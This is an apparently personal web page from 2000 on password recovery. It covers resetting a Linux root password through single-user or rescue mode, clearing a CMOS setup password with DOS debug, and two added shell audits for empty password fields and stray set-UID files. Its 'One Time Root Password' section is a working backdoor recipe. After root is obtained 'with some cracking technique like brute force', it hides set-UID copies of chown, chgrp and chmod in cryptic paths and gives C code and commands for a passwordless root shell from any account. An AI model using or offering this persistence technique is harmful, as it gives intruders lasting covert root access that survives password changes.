Password Recovery

What if you have forgotten a password and can't fully use your own system? Here I'm giving some ways to get out of this trouble. There are many types of password protection systems and not all of them can be broken or cracked, but I can help you with those systems that I have broken or know how to break.

Recover Linux Root Password:-

It was a PC at my college and we didn't know the root password. I tried something that worked fine, so I am describing it here for anyone who might need a solution to the same situation.

What I did at college was a long procedure, but now I know a better way. First get to LILO's boot prompt. If you have a graphical LILO prompt then press CTRL-X to get the text prompt and enter the following:

boot: linux 1

Now you will enter single-user mode, where you won't be asked for any password but will still have root privileges. Open /etc/passwd and remove the encrypted password from there. You will find a line like the following in /etc/passwd:

root:x:0:0:root:/root:/bin/bash

The x written in the file between root: and :0 is the password field. Originally there would be a long encrypted string of the password here, but for security purposes on some systems it is replaced by something else (like x here) and the original strings are kept in the file /etc/shadow. So if you have that encrypted string there then you have to delete the whole string. Your line should look somewhat like:-

root::0:0:root:/root:/bin/bash

You can also delete the encrypted string from /etc/shadow instead of /etc/passwd, and that is even better. Now save the file, quit the editor and then log out by pressing CTRL-D; this will not only log you out but also reboot the system. Now boot Linux as usual. On the login prompt enter root as the login name and don't type anything as the password, just hit enter and voila! You are logged in successfully. Now you can set a new password using the passwd command.

If this worked then there is no need to read further, but if it is not possible due to some problem (for instance related to LILO) then here is another way.

Another Way

This way is not only for recovering the password; you can use it in many LILO or GRUB related problems. First I used a bootable Linux CD to boot the system. I used the CD just to get a boot prompt. Once you get a boot prompt enter this:-

boot: linux rescue

After confirming some defaults it will give you a shell prompt to work further. Then make a directory to mount the / (root) file system of your Linux partition on, and then mount the root partition on it.

mkdir /tmpmount                 # Note:1)This is being made in the RAM 
                                # because we are  working in a virtual
                                # file system called RAMdisk.
mount /dev/hda4 /tmpmount       # Note:2)In  my  case  hda4  had the /    
                                # (root) file system.
cd /tmpmount/etc
vi passwd
NOTE: Some newer versions do this mounting for you, so check your CD's documentation.

At this moment I understood the importance of vi. Before that I was a critic of it. It is a fact that this is the only editor which is available even in such circumstances.

Now use the cursor movement keys j (for down), k (for up), h (for right) and l (for left) to locate the line:-

root:x:0:0:root:/root:/bin/bash

Now put your cursor on the x after root: and press x to delete it. I want to clarify two things here. First, when you enter vi you are in command mode by default, so whatever key you press will be taken as a command and not inserted into the file. Here x is the command to delete the character under the cursor.

The second thing is the x written in the file between root: and :0. Originally there would be a long encrypted string of the password here, but for security purposes on some systems it is replaced by something else (like x here) and the original strings are kept in another file (/etc/shadow). So if you have that encrypted string there then you have to delete the whole string using the x command repeatedly. Your line should look somewhat like:-

root::0:0:root:/root:/bin/bash

Now enter :wq to save the file and exit the editor. Then unmount the file system and log out by giving these commands:-

:wq
cd /
umount tmpmount
[Ctrl-D]             # Note: press D while Control key is down.

This will not only log you out but also reboot the system. Now remove the CD from the drive and boot Linux as usual. On the login prompt enter root as the login name and don't type anything as the password, just hit enter and voila! You are logged in successfully. Now you can set a new password using the passwd command.
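Both procedures above leave an account with an empty password field, which is exactly what an administrator auditing a machine should look for afterwards. The following shell functions are an added example (not from the original page): they report empty password fields and any extra UID-0 entries in a passwd- or shadow-format file, so they can be run against /etc/passwd, /etc/shadow, or a file under a rescue mount such as /tmpmount/etc/passwd; the sample file contents below are constructed.

```shell
# Added example: audit a passwd- or shadow-format file for weak entries.
# Usage: audit_passwd_file /etc/passwd   (or /tmpmount/etc/passwd from a
# rescue shell). Prints one finding per line; prints nothing when clean.
audit_passwd_file() {
    awk -F: '
        # field 2 is the password field in both passwd and shadow files
        NF >= 2 && $2 == ""                  { print "empty-password " $1 }
        # passwd lines have exactly 7 fields; field 3 is the numeric UID
        NF == 7 && $3 == "0" && $1 != "root" { print "uid0 " $1 }
    ' "$1"
}

# Returns 0 (true) when the file has no findings, 1 otherwise.
audit_passwd_file_ok() {
    [ -z "$(audit_passwd_file "$1")" ]
}

# Constructed sample: /etc/passwd after root's password field has been
# blanked, plus a second UID-0 account that should never be there.
SAMPLE_PASSWD=$(mktemp)
cat > "$SAMPLE_PASSWD" <<'EOF'
root::0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
ashu:x:500:500:Ashutosh:/home/ashu:/bin/bash
toor:x:0:0:second root:/root:/bin/bash
EOF

# Constructed sample shadow lines: a locked ("!") entry is fine, empty is not.
SAMPLE_SHADOW=$(mktemp)
cat > "$SAMPLE_SHADOW" <<'EOF'
root::11000:0:99999:7:::
bin:!:11000:0:99999:7:::
EOF

audit_passwd_file "$SAMPLE_PASSWD"   # empty-password root / uid0 toor
audit_passwd_file "$SAMPLE_SHADOW"   # empty-password root
```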

One Time Root Password

What to do if you get the UNIX root password for one-time use? In other words, if you somehow got the root password with some cracking technique like brute force, what do you do next? In a few seconds you can make an arrangement so that you can access the root account without any password. It means that future password changes will not affect your access to root. What to do in those few seconds is as follows:

[root@xyz /]# cp /bin/ch* /usr/lib/    # /usr/lib/ is just an example.
[root@xyz /]# chmod 7777 /usr/lib/ch*  # You Should use more cryptic paths

Isn't it a matter of a few seconds? But before going further, let me explain the meaning of the above two lines. The first line does nothing but copy three files to some arbitrary (wherever you think it is safe) location. These three files are:

  1. /bin/chgrp
  2. /bin/chmod
  3. /bin/chown

I used ch* because in the /bin directory only these three files have a ch prefix. After copying these three files to some cryptic location I used the chmod command to grant all accesses and set UID to root. I could have used a more sophisticated access mask to make them set UID to root, but I used just four sevens because it is easy to remember. One more thing: here too I have used ch* because I was sure that in the /usr/lib/ directory only the files I had just copied had the ch prefix. You should use your own way to pass them to the chmod command. In short, the whole purpose of these two commands is to get a copy of these three files with set UID to root.

After running the above two commands you can safely exit the root shell. You no longer need root access now because, as long as the three files remain there intact, you can get access to root from any account (even guest) on that computer. How? That is what we will discuss now. First of all realize the power you have. Now that you have these commands with set UID to root, you can change the owner/group of any file to root/root, even as an ordinary user. Then you can change the mode of that file to set UID, and thus you can run any program with set UID root. In the old days people often made the shell itself a set UID program so that they could easily run every command as root, but these days, due to a new security feature, this will not work because having set UID in the file access bits alone is no longer sufficient. The program also needs to call the setuid system call to activate the access. Later the program can also deactivate it. This feature limits the power of set UID to only a small piece of code and thus keeps it free from unwanted security bugs. To cope with this feature we have to write a C program so that we can work in a root shell.

This is a program which works much like the su command, but the only difference is that it doesn't ask you for a password. So here is the code.

mysu.c

/* The four lines of main() are the program as originally given; the #include lines are added so it compiles cleanly on current compilers. */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char *argv[]){
    /* switch to the requested UID (0, root, when none is given), then hand over to su */
    if(-1 == setuid((argc>1) ? atoi(argv[1]) : 0)) perror("su");
    execlp("su", "su", (char *)0);
}

It is just a matter of 4 lines of code. Now compile it and prepare it for running with these commands.

[ashu@xyz ashu]# gcc mysu.c -o mysu       # Compile the code to get "mysu".
[ashu@xyz ashu]# /usr/lib/chown root mysu # Change the Owner.
[ashu@xyz ashu]# /usr/lib/chgrp root mysu # Change the Group.
[ashu@xyz ashu]# /usr/lib/chmod 7777 mysu # Change the Mode to "set UID".
[ashu@xyz ashu]# ./mysu                   # Run mysu.
[root@xyz ashu]#                          # Voila !!! You are root now.

I think there is no need to explain any further. I have tested it on a Linux box many times and it works, but once when I got an Irix machine I tried it and it didn't work. I didn't get much time on that machine so I couldn't experiment with it. If somebody has an Irix machine please do some research and tell me if you succeed. If you have some other UNIXes then tell me if this works on those UNIX flavours too.
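The persistence trick above depends on set-UID copies of system binaries sitting in an unexpected place, plus a small set-UID wrapper like mysu, so the standard check on the defending side is to enumerate set-UID/set-GID files and compare them with a baseline taken from a clean install. The following shell functions are an added example (not from the original page) that does this for a directory tree; the demo tree, its file names and the baseline file are constructed for illustration.

```shell
# Added example: enumerate set-UID/set-GID files and report those missing
# from a baseline. Real use: unexpected_setid_files / /root/setid-baseline.txt

# Print "<octal mode> <owner> <path>" for every set-UID or set-GID regular
# file under directory $1, without crossing into other file systems.
list_setid_files() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        -exec stat -c '%a %U %n' {} + 2>/dev/null | sort
}

# Print every set-id path under $1 that is not listed in baseline file $2
# (one absolute path per line). Returns 0 when nothing unexpected is found.
unexpected_setid_files() {
    list_setid_files "$1" | awk -v base="$2" '
        BEGIN { while ((getline line < base) > 0) known[line] = 1 }
        !($3 in known) { print $3; found = 1 }
        END { exit found ? 1 : 0 }'
}

# Constructed demo tree: one legitimate set-UID binary recorded in the
# baseline, one planted set-UID copy (like the /usr/lib/ch* copies above;
# 4755 is used here since non-root users may not keep the set-GID bit),
# and one ordinary library file that must not be reported.
DEMO=$(mktemp -d)
mkdir -p "$DEMO/bin" "$DEMO/usr/lib"
: > "$DEMO/bin/su";          chmod 4755 "$DEMO/bin/su"
: > "$DEMO/usr/lib/chmod";   chmod 4755 "$DEMO/usr/lib/chmod"
: > "$DEMO/usr/lib/libc.so"; chmod 0755 "$DEMO/usr/lib/libc.so"
printf '%s\n' "$DEMO/bin/su" > "$DEMO/baseline.txt"

unexpected_setid_files "$DEMO" "$DEMO/baseline.txt" \
    || echo "unexpected set-id file(s) found"
```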

Recover BIOS Password

WARNING: DO THIS AT YOUR OWN RISK.

To break the BIOS's system password you have to take out the battery or move a jumper (consult the manufacturer's manual) for some time, but if this is just a CMOS Setup password then you don't need any hardware work, as you can at least boot your system. So this is for those who have to break the CMOS Setup password.

For this you need DOS or Windows 98 (not NT/2000/XP), so if you don't have any of these installed then use a boot floppy or a Windows 98 bootable CD to boot into one of these. Now at the DOS prompt enter the following:-

C:\>debug
-o 70 12
-o 71 12
-q
C:\>

You are done! Now reboot and enter the CMOS Setup by pressing the DEL key or whatever your BIOS uses. It will not ask for any password. Now check all your settings, as it also resets some settings to defaults, so change them and/or the password if you want. I have successfully tested it on many Award and Phoenix BIOSes on PCs but not on any others like Mac. Once again, DO THIS AT YOUR OWN RISK.


Copyright ©2000. Ashutosh Raghuwanshi.
All Rights Reserved.